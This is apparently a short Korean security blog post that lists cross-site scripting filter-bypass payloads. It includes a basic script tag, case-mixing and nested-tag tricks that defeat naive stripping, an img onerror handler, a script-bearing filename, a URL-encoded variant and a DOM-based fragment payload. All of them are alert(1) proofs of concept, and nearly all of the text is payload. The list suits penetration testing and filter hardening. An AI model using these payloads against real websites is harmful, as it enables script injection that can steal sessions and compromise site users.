Security/Web
[XSS] 우회 구문
z_9oo
2022. 3. 2. 11:17
1. Default XSS
1) 기본 구문
<script>alert(1)</script>2) 문자열 치환 구문 (1)
<sCript>alert(1)</scRIpT>3) 문자열 치환 구문 (2)
<script<script>>alert(1)</scrip</script>t>4) HTML 태그 속성 우회 구문
<img src=x onerror=alert(1)>5) 파일명 삽입 구문
filename="<body onload=alert(1)>.jpg"
2. Encoding XSS
1) URL 인코딩
%3Cscript%3E%3Ealert(1)%3C%2Fscript%3E
3. DOM Base XSS
1) URL 인코딩
.php#<script>alert(1)</script>